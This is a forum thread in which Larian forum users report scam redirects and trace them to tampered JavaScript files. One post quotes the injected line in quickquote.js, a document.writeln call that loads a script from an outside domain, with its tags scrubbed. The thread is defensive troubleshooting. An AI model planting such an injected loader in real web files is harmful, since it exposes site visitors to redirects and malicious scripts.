Larian Banner: Baldur's Gate Patch 9
Previous Thread
Next Thread
Print Thread
#650502 18/10/18 12:49 AM
Joined: Nov 2016
C
Bugfinder General
OP Offline
Bugfinder General
C
Joined: Nov 2016
I keep getting redirected to a site claiming I won some sort of Amazon rebate - only happens when I click on a thread within the forum. Is this by design or have we been hacked?

Joined: Sep 2016
stranger
Offline
stranger
Joined: Sep 2016
I got this too! Another user in one of the support forums thinks it might be an infected image, since this forum lets people link to any url for their profile avatar, which seems like a really bad idea.

For the record, I am using Chrome.

Time to clear the browser cache at least.

Last edited by DuchessOfKvetch; 18/10/18 05:43 PM.
Joined: May 2010
Location: Oxford
Duchess of Gorgombert
Offline
Duchess of Gorgombert
Joined: May 2010
Location: Oxford
There seems to be a dodgy-looking script linking to qqtx.me: I don't know its provenance and after I flagged it, it's being "looked into" but personally I would (and have) nuke it with NoScript or similar.


J'aime le fromage.
Joined: Sep 2016
stranger
Offline
stranger
Joined: Sep 2016
This is happening again today, even though it was cleaned up yesterday afternoon. Could be a compromised login account posting injected script to a forum post? Or using it in their avatar url?

There is a newer version of UBB btw (7.6), they keep patching more XSS vulnerabilities!

Joined: May 2010
Location: Oxford
Duchess of Gorgombert
Offline
Duchess of Gorgombert
Joined: May 2010
Location: Oxford
I'm afraid I'm as in the dark as you are; I only have the most basic admin access to get rid of problem users, but it seems one of the javascript files was modified at some point recently. Still waiting on an update as to what's behind it. But without knowing its history if could be a red herring.


J'aime le fromage.
Joined: Sep 2016
stranger
Offline
stranger
Joined: Sep 2016
Can you at least update the site's js files? Because you don't have any security on your static files, they're easily viewable to the public (true enough for a lot of sites' js files, but generally opens one up even more to hackers).

So I can see a line that shouldn't be there in : http://larian.com/forums/ubb_js/quickquote.js?v=7.5.8, mid way down:

document.writeln("***** src=\'//om.qqtx.me/jquery.jscroll.min.js\'></*****>");
(script tags scrubbed for safety)

Now, how someone has modified this file is another story, as there could be a MMTM attack going on, especially if the local server's copy is clean, but the one we're downloading as clients is NOT. If you restore with the original UBB script file, does the issue come back?

Joined: May 2010
Location: Oxford
Duchess of Gorgombert
Offline
Duchess of Gorgombert
Joined: May 2010
Location: Oxford
I'm afraid I can't: I only have access to the bit of the CP that deals with user accounts and no access at all to the server itself, frustratingly. I am concerned about the integrity of the server but I have no means of ascertaining the current situation but it does seem that multiple js files are affected. Speaking personally I would've shut down the whole thing until I figured out the source of the problem but that's beyond my control.


J'aime le fromage.
Joined: Nov 2016
C
Bugfinder General
OP Offline
Bugfinder General
C
Joined: Nov 2016
RE: " I would've shut down the whole thing until I figured out the source of the problem"

Looks like they heard you smile

Joined: May 2010
Location: Oxford
Duchess of Gorgombert
Offline
Duchess of Gorgombert
Joined: May 2010
Location: Oxford
I can be quite annoying when required. biggrin


J'aime le fromage.

Moderated by  ForkTong, Larian_QA, Lar_q, Lynn, Macbeth 

Link Copied to Clipboard
Powered by UBB.threads™ PHP Forum Software 7.7.5